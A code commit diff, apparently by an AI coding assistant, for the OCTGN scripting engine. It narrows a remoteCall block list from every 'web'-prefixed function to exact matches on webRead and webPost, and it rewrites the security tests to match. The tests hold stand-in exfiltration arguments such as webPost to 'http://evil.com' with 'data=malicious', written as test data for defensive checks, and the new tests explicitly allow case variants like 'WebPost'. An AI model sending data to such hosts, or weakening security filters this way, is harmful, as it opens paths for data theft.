Fix overly broad web function blocking per feedback

Co-authored-by: kellyelton <1356163+kellyelton@users.noreply.github.com>

Author: Copilot

octgnFX/Octgn.JodsEngine/Scripting/Engine.cs

@@ -507,19 +507,11 @@ private static bool IsDangerousFunction(string function)
             {
                 "exec", "eval", "compile", "__import__", "open", "file", "input", "raw_input",
                 "reload", "execfile", "apply", "getattr", "setattr", "delattr", "hasattr",
-                "globals", "locals", "vars", "dir", "exit", "quit"
+                "globals", "locals", "vars", "dir", "exit", "quit",
+                "webRead", "webPost"
             };
 
-            return dangerousFunctions.Contains(function) || IsWebFunction(function);
-        }
-
-        /// <summary>
-        /// Checks if a function name is a web-related function that should not be allowed via remoteCall
-        /// </summary>
-        private static bool IsWebFunction(string function)
-        {
-            // Block all web-related functions to prevent remote users from making arbitrary web requests
-            return function.StartsWith("web", StringComparison.OrdinalIgnoreCase);
+            return dangerousFunctions.Contains(function);
         }
 
         /// <summary>

octgnFX/Octgn.Test/OctgnApp/Scripting/RemoteCallValidUseCasesTests.cs

@@ -1372,14 +1372,11 @@ public void ExecuteFunctionSecureNoFormat_RealWorldComplexDictionary_ShouldSucce
         [Test]
         public void ExecuteFunctionSecureNoFormat_WebFunctions_AreBlockedFromRemoteCall()
         {
-            // This test verifies that web functions are properly blocked when called via remoteCall mechanism
+            // This test verifies that the actual web functions are properly blocked when called via remoteCall mechanism
             var webFunctions = new[]
             {
                 "webPost",
-                "webGet",
-                "webRead",
-                "website",
-                "webApi"
+                "webRead"
             };
 
             foreach (var webFunction in webFunctions)
@@ -1414,6 +1411,29 @@ public void ExecuteFunctionSecureNoFormat_NonWebFunctions_AreAllowedFromRemoteCa
             }
         }
 
+        [Test]
+        public void ExecuteFunctionSecureNoFormat_WebPrefixedNonWebFunctions_AreAllowedFromRemoteCall()
+        {
+            // This test verifies that functions starting with "web" but not actual web functions are allowed
+            // This ensures we're not being overly broad in our blocking
+            var webPrefixedFunctions = new[]
+            {
+                "website",
+                "webGet", 
+                "webApi",
+                "webSocket",
+                "webCustomFunction"
+            };
+
+            foreach (var function in webPrefixedFunctions)
+            {
+                // Act & Assert - non-web functions starting with "web" should NOT throw
+                Assert.DoesNotThrow(() =>
+                    _engine.ExecuteFunctionSecureNoFormat(function, "\"test\""),
+                    $"Function '{function}' starting with 'web' but not actual web function should not be blocked");
+            }
+        }
+
         #endregion
     }
 }

octgnFX/Octgn.Test/OctgnApp/Scripting/SecurityTests.cs

@@ -2088,15 +2088,15 @@ public void ExecuteFunctionSecureNoFormat_WebFunctions_BlocksWebPost()
         [Test]
         public void ExecuteFunctionSecureNoFormat_WebFunctions_BlocksWebGet()
         {
+            // Note: webGet is not an actual OCTGN web function, but we test it to show it's NOT blocked
             // Arrange
             var function = "webGet";
             var args = "\"http://evil.com\"";
 
-            // Act & Assert
-            var ex = Assert.Throws<ScriptSecurityException>(() => 
-                _engine.ExecuteFunctionSecureNoFormat(function, args));
-            
-            Assert.That(ex.SecurityReason, Contains.Substring("Dangerous function name"));
+            // Act & Assert - This should NOT be blocked since webGet is not a real web function
+            Assert.DoesNotThrow(() => 
+                _engine.ExecuteFunctionSecureNoFormat(function, args),
+                "webGet is not a real OCTGN web function so should not be blocked");
         }
 
         [Test]
@@ -2114,55 +2114,59 @@ public void ExecuteFunctionSecureNoFormat_WebFunctions_BlocksWebRead()
         }
 
         [Test]
-        public void ExecuteFunctionSecureNoFormat_WebFunctions_BlocksAnyWebFunction()
+        public void ExecuteFunctionSecureNoFormat_WebFunctions_BlocksActualWebFunctions()
         {
-            // Test that any function starting with "web" is blocked
-            var webFunctions = new[]
+            // Test that only the actual OCTGN web functions are blocked
+            var actualWebFunctions = new[]
             {
                 "webPost",
-                "webGet", 
-                "webRead",
-                "webRequest",
-                "webDownload",
-                "webUpload",
-                "webCall",
-                "website",
-                "webApi",
-                "webSocket",
-                "webService",
-                "webPage",
-                "webQuery",
-                "webSubmit",
-                "webFetch",
-                "WebPost", // Test case sensitivity
-                "WEBGET",  // Test case sensitivity
-                "WebRead"  // Test case sensitivity
-            };
-
-            foreach (var webFunction in webFunctions)
+                "webRead"
+            };
+
+            foreach (var webFunction in actualWebFunctions)
             {
-                // Act & Assert
+                // Act & Assert - These should be blocked
                 var ex = Assert.Throws<ScriptSecurityException>(() => 
                     _engine.ExecuteFunctionSecureNoFormat(webFunction, "\"http://example.com\""),
-                    $"Web function '{webFunction}' should be blocked");
+                    $"Actual web function '{webFunction}' should be blocked");
 
                 Assert.That(ex.SecurityReason, Contains.Substring("Dangerous function name"),
                     $"Security exception for '{webFunction}' should mention dangerous function");
             }
         }
 
+        [Test]
+        public void ExecuteFunctionSecureNoFormat_WebFunctions_AllowsNonWebFunctions()
+        {
+            // Test that functions starting with "web" but not actual web functions are allowed
+            var nonWebFunctions = new[]
+            {
+                "webGet",      // Not a real OCTGN function
+                "website",     // Not a real OCTGN function  
+                "webApi",      // Not a real OCTGN function
+                "webSocket",   // Not a real OCTGN function
+                "webService",  // Not a real OCTGN function
+                "WebPost",     // Case variation - not exact match
+                "WEBREAD"      // Case variation - not exact match
+            };
+
+            foreach (var nonWebFunction in nonWebFunctions)
+            {
+                // Act & Assert - These should NOT be blocked
+                Assert.DoesNotThrow(() => 
+                    _engine.ExecuteFunctionSecureNoFormat(nonWebFunction, "\"http://example.com\""),
+                    $"Non-web function '{nonWebFunction}' should not be blocked");
+            }
+        }
+
         [Test]
         public void ExecuteFunctionSecureNoFormat_WebFunctions_BlocksWithVariousArguments()
         {
-            // Test various argument combinations that should all be blocked
+            // Test various argument combinations for actual web functions that should all be blocked
             var testCases = new[]
             {
                 new { Function = "webPost", Args = "\"http://evil.com\", \"data=malicious\"" },
-                new { Function = "webGet", Args = "\"http://evil.com/steal_data\"" },
-                new { Function = "webRead", Args = "\"http://evil.com\", 5000" },
-                new { Function = "website", Args = "Player(1), \"http://phishing.com\"" },
-                new { Function = "webApi", Args = "[\"http://evil1.com\", \"http://evil2.com\"]" },
-                new { Function = "webCall", Args = "{\"url\": \"http://evil.com\", \"method\": \"POST\"}" }
+                new { Function = "webRead", Args = "\"http://evil.com\", 5000" }
             };
 
             foreach (var testCase in testCases)